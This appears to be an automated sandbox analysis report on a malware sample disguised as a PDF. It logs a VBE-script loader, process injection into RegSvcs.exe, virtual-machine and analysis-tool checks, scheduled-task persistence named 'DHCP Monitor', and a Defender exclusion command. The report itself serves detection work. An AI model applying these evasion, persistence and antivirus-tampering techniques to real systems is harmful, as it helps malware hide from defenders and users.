Source: ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475601066.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.478174099.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475387940.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477979894.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESS
Source: ihgsvw.exe, 00000021.00000003.477385380.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475550316.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475281138.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477100320.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477315670.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475335079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ihgsvw.exe, 00000023.00000003.495486843.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000002.498875275.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.497141076.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494456875.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493999375.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN\N`V
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEKW
Source: ihgsvw.exe, 00000015.00000003.382971984.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381984041.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383092560.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382181894.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381251567.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")^\
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334500241.0000000001730000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386006427.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 79 > 30 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 117 > 30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 88 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 106 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 114 > 30
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 9453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 1561 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe API coverage: 8.4 %
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then#+
Source: ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exey
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe:
Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe
Source: ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Thenzo
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe
Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exey
Source: RegSvcs.exe, 0000000A.00000002.769785143.0000000001067000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe
Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exeb
Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenYu8
Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exee
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then0
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exel
Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe536C7
Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exeV
Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: ihgsvw.exe, 00000015.00000003.383061801.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exeE97637D6
Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exed
Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EE6A3 VirtualQuery,GetSystemInfo, 0_2_003EE6A3
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_003DA69B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_003EC220
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FB348 FindFirstFileExA, 0_2_003FB348
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00C0E387
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00C0D836
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00C1A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00C1A488
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose, 6_2_00C165F1
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDC642 FindFirstFileExW, 6_2_00BDC642
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 6_2_00C172E9
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C17248 FindFirstFileW,FindClose, 6_2_00C17248
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00BA5D78
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F7DEE mov eax, dword ptr fs:[00000030h] 0_2_003F7DEE
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC5078 mov eax, dword ptr fs:[00000030h] 6_2_00BC5078
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003EF838
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FC030 GetProcessHeap, 0_2_003FC030
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1F3FF BlockInput, 6_2_00C1F3FF
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF9D5 SetUnhandledExceptionFilter, 0_2_003EF9D5
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003EFBCA
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003F8EBD
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0D65 SetUnhandledExceptionFilter, 6_2_00BC0D65
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00BD29B2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00BC0BCF
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00BC0FB1

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 5D7000 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: select * from antivirusproducta32e83d//////8bd16a2ee83=zl
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de0fe3ac427d61269f,z}
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269f[zj
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de03e8ac4574770cjz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269fyz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269fhz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -command add-mppreference -exclusionpath /83c4/cffd/6gz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4f378ea10302
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\folder10_51tensi
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c70ae2a444794b787aaca0877a44687555378ea10302
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c61ef5a7537d61269fz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175r.ktl<ym
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846da9657f750_51+yz
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eeab5f7c770ab38aea25559365ae7f7e49fae
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binaryenc61ef5a7537d6ey
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntunmapviewofsectiond6|y
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user32.dll61ef5a7537d6sy
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ndowprocwjy
